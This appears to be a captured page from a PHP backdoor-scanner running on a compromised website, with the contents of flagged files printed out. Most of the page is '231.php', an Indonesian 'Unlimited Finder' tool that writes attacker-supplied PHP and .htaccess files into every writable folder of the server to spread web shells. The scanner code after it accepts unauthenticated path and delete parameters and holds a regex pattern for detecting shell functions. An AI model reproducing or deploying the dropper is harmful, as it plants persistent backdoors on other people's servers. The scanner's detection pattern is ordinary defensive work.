[Self Delete]

CURRENT DIR: /home/rsudmnatsir/public_html/album
[+] Susspect file -> [DELETE] /home/rsudmnatsir/public_html/album/231.php

<?php
function getAllFolders($dir) {
    $folders = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($iterator as $file) {
        if ($file->isDir()) {
            $folders[] = $file->getRealPath();
        }
    }
    return $folders;
}

function writeToFile($path, $filename, $content, $chmod = null) {
    $filePath = $path . DIRECTORY_SEPARATOR . $filename;
    $success = @file_put_contents($filePath, $content);

if ($success === false) {
        return [false, $filePath];
    }

if (!is_null($chmod)) {
        @chmod($filePath, octdec($chmod));
    }

return [true, $filePath];
}

function generateRandomFilename($length = 10) {
    return bin2hex(random_bytes($length / 2)) . '.php';
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $phpContent = $_POST['php_content'] ?? '';
    $htaccessContent = $_POST['htaccess_content'] ?? '';
    $chmodValue = $_POST['chmod_value'] ?? null;
    $changeDir = trim($_POST['change_dir'] ?? '');

if (empty($phpContent)) {
        die("<p style='color:red; text-align:center;'>❌ Konten PHP tidak boleh kosong!</p>");
    }

$rootFolder = __DIR__;
    if (!empty($changeDir)) {
        if (substr($changeDir, 0, 1) === '/' || preg_match('/^[A-Za-z]:\\\\/', $changeDir)) {
            $combinedPath = $changeDir;
        } else {
            $combinedPath = rtrim(__DIR__, '/') . '/' . ltrim($changeDir, '/');
        }

if (is_dir($combinedPath)) {
            $rootFolder = realpath($combinedPath);
        } else {
            die("<p style='color:red; text-align:center;'>❌ Change Dir tidak ditemukan: <code>$combinedPath</code></p>");
        }
    }

$allFolders = getAllFolders($rootFolder);
    array_unshift($allFolders, $rootFolder);

$resultDetails = [];

foreach ($allFolders as $folder) {
        if (!is_writable($folder)) {
            $resultDetails[] = "⚠️ Tidak bisa tulis di: $folder (permission denied)";
            continue;
        }

$randomFilename = generateRandomFilename();
        $uploaded = false;

if (!empty($phpContent)) {
            list($success, $path) = writeToFile($folder, $randomFilename, $phpContent, $chmodValue);
            if ($success) {
                $resultDetails[] = "✅ File PHP dikirim: $path";
                $uploaded = true;
            } else {
                $resultDetails[] = "❌ Gagal menulis file PHP di: $path";
            }
        }

if (!empty($htaccessContent)) {
            list($success, $path) = writeToFile($folder, '.htaccess', $htaccessContent, $chmodValue);
            if ($success) {
                $resultDetails[] = "✅ .htaccess dikirim: $path";
            } else {
                $resultDetails[] = "❌ Gagal menulis .htaccess di: $path";
            }
        }
    }

echo "<h2>📄 Hasil Upload Finder:</h2><ul>";
    $resultText = "Hasil Finder:\n\n";
    foreach ($resultDetails as $detail) {
        echo "<li>$detail</li>";
        $resultText .= "$detail\n";
    }
    echo "</ul>";

file_put_contents(__DIR__ . '/result1337.txt', $resultText);
    echo "<p>📝 Log disimpan di <strong>result1337.txt</strong></p>";
}
?>

<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <title>Kitabisacom1337 - Unlimited Finder</title>
    <style>
        body { font-family: Arial, sans-serif; background-color: #222; color: #eee; padding: 20px; }
        form {
            background: #fff; color: #333;
            border-radius: 8px; padding: 20px;
            max-width: 600px; margin: 0 auto;
            box-shadow: 0 0 10px rgba(0,0,0,0.2);
        }
        label { font-weight: bold; display: block; margin-top: 15px; }
        textarea, input[type="text"], input[type="submit"] {
            width: 100%; padding: 10px;
            margin-top: 5px; border: 1px solid #ccc; border-radius: 4px;
        }
        textarea { resize: vertical; }
        input[type="submit"] {
            background-color: #28a745; color: white;
            cursor: pointer; border: none;
        }
        input[type="submit"]:hover { background-color: #218838; }
        h2 { text-align: center; margin-top: 30px; color: #fff; }
        ul {
            list-style: none; padding: 0;
            background: #fff; color: #333;
            border-radius: 8px; max-width: 600px;
            margin: 20px auto; padding: 20px;
        }
        li { padding: 8px; border-bottom: 1px solid #ddd; }
        li:last-child { border-bottom: none; }
        p { text-align: center; }
    </style>
</head>
<body>

<form method="post">
    <label for="php_content">📦 Konten File PHP (WAJIB):</label>
    <textarea name="php_content" rows="6" required placeholder="Contoh: <?php echo 'finder'; ?>"></textarea>

<label for="htaccess_content">📜 Konten File .htaccess (opsional):</label>
    <textarea name="htaccess_content" rows="4" placeholder="Contoh: ForceType application/x-httpd-php"></textarea>

<label for="chmod_value">🔐 CHMOD File (Contoh: 0644):</label>
    <input type="text" name="chmod_value" placeholder="Contoh: 0644">

<label for="change_dir">📁 Change Dir (relatif atau absolut):</label>
    <input type="text" name="change_dir" placeholder="contoh: wp-content/uploads atau /home/user/path">

</body>
</html>

>
[+] Susspect file -> [DELETE] /home/rsudmnatsir/public_html/album/scan.php

<?php
/*
author :sohay
title: backdoor scanner v 1.0.0
*/
echo '<style>body {background-color:#000;color:green;} body,td,th { font: 9pt Courier New;margin:0;vertical-align:top; } span,h1,a { color:#00ff00} span { font-weight: bolder; } h1 { border:1px solid #00ff00;padding: 2px 5px;font: 14pt Courier New;margin:0px; } div.content { padding: 5px;margin-left:5px;} a { text-decoration:none; } a:hover { background:#ff0000; } .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea { width:100%;height:250px; } input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,"Courier New"; } form { margin:0px; } #toolsTbl { text-align:center; } .toolsInp { width: 80%; } .main th {text-align:left;} .main tr:hover{background-color:#5e5e5e;} .main td, th{vertical-align:middle;} pre {font-family:Courier,Monospace;} #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft   document.documentElement.clientWidth - offsetWidth);} .style2 {color: #00FF00} .style3 {color: #009900} .style4 {color: #006600} .style5 {color: #00CC00} .style6 {color: #003300} .style8 {color: #33CC00} #footer { margin-bottom: 10px; color: #666; vertical-align: top; text-align: center; font-size: 11px; } #footer ul { margin: 0; padding: 0; list-style: none; } #footer li { display: inline-block; margin-right: 15px; border-right: 1px solid #666; vertical-align: middle; } #footer li a { margin-right: 15px; } #footer li:last-child { margin-right: 0; border-right: 0; } #footer li:last-child a { margin-right: 0; } #footer a { color: #666; } #footer a:hover { color: #858585; } #footer .footer-left { height: 20px; vertical-align: middle; line-height: 20px; } @media (min-width: 39rem) { #footer { display: flex; flex-flow: row wrap; justify-content: space-between; align-items: center; align-content: center; margin-bottom: 20px; } #footer .footer-left { align-self: flex-start; margin-right: 20px; } #footer .footer-right { align-self: flex-end; } }</style>';
set_time_limit(0);
error_reporting(0);
@ini_set('zlib.output_compression', 0);
@ini_set('implicit_flush', 1);
for($i = 0; $i < ob_get_level(); $i++) { ob_end_flush(); }
ob_implicit_flush(1);
// if($argv[1]){
// 	$dir = $argv[1];
// 	scanBackdoor("$dir");
// }else{
// 	echo "Usage php scan.php /home or /public_html/.";
// }

$path = getcwd();
if(isset($_GET['dir'])){
    $path =$_GET['dir'];
}

if(isset($_GET['kill'])){
    unlink(__FILE__);
}
echo "<a href='?kill'><font color='yellow'>[Self Delete]</font></a><br>";
echo '<form action="" method="get"> <input type="text" name="dir" value='.$path.' style="width: 548px;"> <input type="submit" value="scan"></form><br>';

echo "CURRENT DIR: <font color='yellow'>$path</font><br>";
if(isset($_GET['delete'])){
    unlink($_GET['delete']);
    $status = "<font color='red'>FAILED</font>";
    if(!file_exists($_GET['delete'])){
        $status = "<font color='yellow'>Success</font>";
		
    }
    echo "TRY TO DELETE: ".$_GET['delete']." $status <br>";exit;
}

scanBackdoor($path);
function save($fname,$value){
	$file = fopen($fname, "a");
	fwrite($file, $value);
	fclose($file);//
}
// $domain = $_SERVER['REQUEST_SCHEME'].'//'.$_SERVER['SERVER_NAME'];
function checkBackdoor($file_location){
    global $path;
    $patern = "#exec\(|gzinflate\(|file_put_contents\(|file_get_contents\(|system\(|passthru\(|shell_exec\(|move_uploaded_file\(|eval\(|base64#";
    $contents = file_get_contents($file_location);
    if(strlen($contents)> 0){
        if(preg_match($patern, strtolower($contents))){
            echo "[+] Susspect file -> <a href='?delete=$file_location&dir=$path'><font color='yellow'>[DELETE]</font></a> <font color='red'>$file_location</font> <br>";
            save("shell-found.txt","$file_location\n");
            echo '<textarea name="content" cols="80" rows="15">'.htmlspecialchars($contents).'</textarea><br>><br>';
        }
    }   
}